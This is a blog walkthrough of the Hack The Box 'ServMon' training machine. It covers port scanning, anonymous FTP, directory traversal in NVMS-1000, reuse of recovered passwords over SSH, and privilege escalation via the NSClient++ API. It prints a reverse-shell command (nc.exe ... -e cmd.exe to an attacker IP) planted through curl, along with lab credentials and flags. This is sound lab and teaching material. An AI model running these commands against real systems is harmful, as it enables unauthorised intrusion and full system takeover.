24th October 2020
Hack The box ServMon machine Info

Hack The Box – ServMon – 10.10.10.184

Monitoring is not protection

Myself

About ServMon

In this post, I’m writing a write-up for the machine ServMon from Hack The Box. Hack The Box is an online platform allowing you to test and advance your skills in cybersecurity.

ServMon is an ‘easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold
After the port scan, I found some interesting open ports, like 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed and through FTP I found in the folder of Nathan a txt-file with the message that there is a ‘Passwords.txt’ file placed on his Desktop. Then, I checked the service on the HTTP port and it seems that the NVMS-1000 software has a Path Traversal vulnerability.

User
Through the Path Traversal vulnerability, I was able to read the ‘passwords.txt’ file from the Desktop of Nathan and establish an SSH connection with the user account of Nadine and grab the user flag.

Root
I checked the 8443 port and found that the software NSClient++ is running on this box. After checking the version of NSClient++ I found that there is a known vulnerability for this particular version. Through the API I was able to put a revshell.bat in the scripts folder and execute this file. The reverse shell was established with Local System privileges.

Machine Info

Hack The box ServMon machine Info
Machine Info
Hack The Box ServMon Machine Info
Machine IP and creator

Recon

Port scan

As always we start with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT                                                                                                                                                                                            
Nmap scan report for 10.10.10.184                                                                                                                                                                                                                          
Host is up (0.063s latency).                                                                                                                                                                                                                               
Not shown: 991 closed ports                                                                                                                                                                                                                                
PORT     STATE SERVICE       VERSION                                                                                                                                                                                                                       
21/tcp   open  ftp           Microsoft ftpd                                                                                                                                                                                                                
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                                                                                                                                                     
|_01-18-20  12:05PM       <DIR>          Users                                                                                                                                                                                                             
| ftp-syst:                                                                                                                                                                                                                                                
|_  SYST: Windows_NT                                                                                                                                                                                                                                       
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)                                                                                                                                                                                        
| ssh-hostkey:                                                                                                                                                                                                                                             
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)                                                                                                                                                                                             
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)                                                                                                                                                                                            
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)                                                                                                                                                                                          
80/tcp   open  http                                                                                                                                                                                                                                        
| fingerprint-strings:                                                                                                                                                                                                                                     
|   GetRequest, HTTPOptions, RTSPRequest:                                                                                                                                                                                                                  
|     HTTP/1.1 200 OK                                                                                                                                                                                                                                      
|     Content-type: text/html                                                                                                                                                                                                                              
|     Content-Length: 340                                                                                                                                                                                                                                  
|     Connection: close                                                                                                                                                                                                                                    
|     AuthInfo:                                                                                                                                                                                                                                            
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">                                                                                                                            
|     <html xmlns="http://www.w3.org/1999/xhtml">                                                                                                                                                                                                          
|     <head>                                                                                                                                                                                                                                               
|     <title></title>                                                                                                                                                                                                                                      
|     <script type="text/javascript">                                                                                                                                                                                                                      
|     window.location.href = "Pages/login.htm";                                                                                                                                                                                                            
|     </script>                                                                                                                                                                                                                                            
|     </head>                                                                                                                                                                                                                                              
|     <body>                                                                                                                                                                                                                                               
|     </body>                                                                                                                                                                                                                                              
|     </html>                                                                                                                                                                                                                                              
|   NULL:                                                                                                                                                                                                                                                  
|     HTTP/1.1 408 Request Timeout                                                                                                                                                                                                                         
|     Content-type: text/html                                                                                                                                                                                                                              
|     Content-Length: 0                                                                                                                                                                                                                                    
|     Connection: close                                                                                                                                                                                                                                    
|_    AuthInfo:                                                                                                                                                                                                                                            
|_http-title: Site doesn't have a title (text/html).                                                                                                                                                                                                       
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                                                                                                         
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                                                                                 
445/tcp  open  microsoft-ds?                                                                                                                                                                                                                               
5666/tcp open  tcpwrapped                                                                                                                                                                                                                                  
6699/tcp open  napster?                                                                                                                                                                                                                                    
8443/tcp open  ssl/https-alt                                                                                                                                                                                                                               
| fingerprint-strings:                                                                                                                                                                                                                                     
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:                                                                                                                                                                                               
|     HTTP/1.1 404                                                                                                                                                                                                                                         
|     Content-Length: 18                                                                                                                                                                                                                                   
|     Document not found                                                                                                                                                                                                                                   
|   GetRequest:                                                                                                                                                                                                                                            
|     HTTP/1.1 302                                                                                                                                                                                                                                         
|     Content-Length: 0                                                                                                                                                                                                                                    
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/11%Time=5E921736%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/11%Time=5E92173E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0t\0t\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\
SF:x02\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\
SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTS
SF:PRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\
SF:x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\
SF:x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T19:19:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds

There are some interesting ports open:

  1. 21/tcp (FTP)
  2. 22/tcp (SSH)
  3. 80/TCP (HTTP)
  4. 8443/tcp (alternative HTTPS)

FTP Anonymous login

Let’s go for the low hanging fruit first. Anonymous access for FTP is allowed, let’s check that first and let’s directly login as anonymous with the default ‘password’ anonymous.

~ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Let’s poke some around.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

I got two user folders ‘Nadine’ and ‘Nathan’. From the directory Nadine I have downloaded a file called ‘Confidential.txt’ and from the folder of Nathan I downloaded the file ‘Notes to do.txt’.

Confidential.txt
This file contains a note from someone with the note that there is a password.txt file left on his desktop. Furthermore, this file is pointing to some secure folder.

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Notes to do.txt
This is an unfinished todo list of Nathan.

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There are no more files for now, let’s checking the other open ports.

NVMS-1000

The next port in the enumeration phase is the HTTP port. I visited the webpage http://10.10.10.184. I landed on a login page of NVMS-1000. This web server is hosting Network Surveillance Management Software. NVMS-1000 is a monitoring client that is specially designed for network video surveillance. 

Maybe I have already found the name of this box: ServMon, Server Monitoring?

Hack The Box SerMon NVMS-1000

I have tried some default username and password combinations, but they are not working. After searching some around on the internet I found that a specific version of NVMS-1000 is vulnerable for Directory Traversal according to this article: https://www.exploit-db.com/exploits/47774. CVE-2019-20085 was assigned to this vulnerability.

I checked this with Burpsuite and I found that this NVMS-1000 is vulnerable for directory traversal attack. I tried to read the /windows/win.ini, every time when the GET is failing I add a extra /../.

Hack The Box ServMon NVMS-1000 Directory Traversal

Ok, now I need to put the pieces together.

Intrusion

Get SSH as Nadine

I know that there is on the desktop of Nathan a file called ‘passwords.txt’. As the NVMS-1000 has a Path Traversal vulnerability I could get that file and grab the passwords.

Hack The Box ServMon NVMS-1000 Path Traversal attack

I have now a list of passwords. I placed all of this passwords in a file called ‘passwords.txt’.

passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

As the SSH port is open I tried first to get an SSH shell as the user Nathan but the passwords are not working for his account. Then I’ve switched to the user account Nadine and managed to get a shell with the password [email protected].

Get the user flag and I can go to the next step: privilege escalation.

~$ ssh [email protected]
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

[email protected] C:\Users\Nadine>cd Desktop

[email protected] C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
15/04/2020  20:51                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,418,095,616 bytes free

[email protected] C:\Users\Nadine\Desktop>type user.txt
7f26c77e1ccd17cede33c1b950c26e4e

[email protected] C:\Users\Nadine\Desktop>

Privilege Escalation

Enumeration

There is a non-default port open on this box, this the port 8443 (alt-https). When I visit this web page through the URL https://10.10.10.184:8443 I landed on the Sign In page of NSClient++. I tried to log in with the passwords I already know, but none of them are working. They are all resulting in a ‘403 Your not allowed’ notification.

Hack The Box ServMon NSClient++

I have already an active SSH session with the user account Nadine. Let’s try to find out which version of NSClient++ this box is running and I need to find the password. On the Documentation webpage from NSClient++ (https://docs.nsclient.org/). I found how I can grab the web administrator password.

[email protected] C:\Users\Nadine>powershell                                                                                                                                                                                                  
Windows PowerShell                                                                                                                                                                                                                         
Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                                                                                  
                                                                                                                                                                                                                                           
Try the new cross-platform PowerShell https://aka.ms/pscore6                                                                                                                                                                               
                                                                                                                                                                                                                                           
PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\'                                                                                                                                                                                      
PS C:\Program Files\NSClient++> .\nscp.exe web password --display
Current password: ew2x6SsGTxjRwXOT

So, the password is ew2x6SsGTxjRwXOT. With the command below I can check the current installed version of NSClient++.

PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

I know that this box is running NSClient++, I know the password and the version of this software. This has to be the way to root this box. Through searchsploit, I checked if there is a known vulnerability for this version of NSClient++ and it seems the case.

~$ searchsploit nsclient++
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
NSClient++ 0.5.2.35 - Privilege Escalation                                                                                                                                                        | exploits/windows/local/46802.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

On this webpage of exploit-db: https://www.exploit-db.com/exploits/46802 there is an explanation about how to get a reverse shell with Local System privileges.

Explotation

NSClient++

I found out there are two ways to root this box:

  1. Through the GUI
  2. or through the API

I’m new to API and I want to learn something, so I choose the API way, in my opinion the easiest way to root this box. I checked the API documentation of NSClient++ for the commands. I started by removing the ‘curl’ alias in Powershell because it refers to the Invoke-WebRequest cmdlet in Powershell. I do not want to use this cmdlet.

PS C:\Program Files\NSClient++> Remove-Item alias:curl

First, I checked if I can call the API throuh the SSH session of Nadine. And it worked.

PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1                                                   │
Enter host password for user 'admin':                                                                                │
{"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https│
://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localh│
ost:8443/api/v1/scripts"}

As CheckExternalScripts and Scheduler are enabled already, I only have to place the script in the ‘C:\Program Files\NSClient++\Scripts’ directory through the API and run this script. I invoked the command below and placed a reverse shell script, named ‘revshell.bat’. Of course, I placed the nc.exe file in the ‘C:\Temp’ directory.

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"

With this command I call the script.

curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m

The reverse shell is established and I can now grab the root flag.

~$ nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50184.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\Administrator\Desktop\root.txt"
d3d0930a47b35c8ae6ff3689411bf7ad

C:\Program Files\NSClient++>

Did you enjoy this write-up as much as I did? Please consider to spend a respect point: https://www.hackthebox.eu/home/users/profile/224856

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *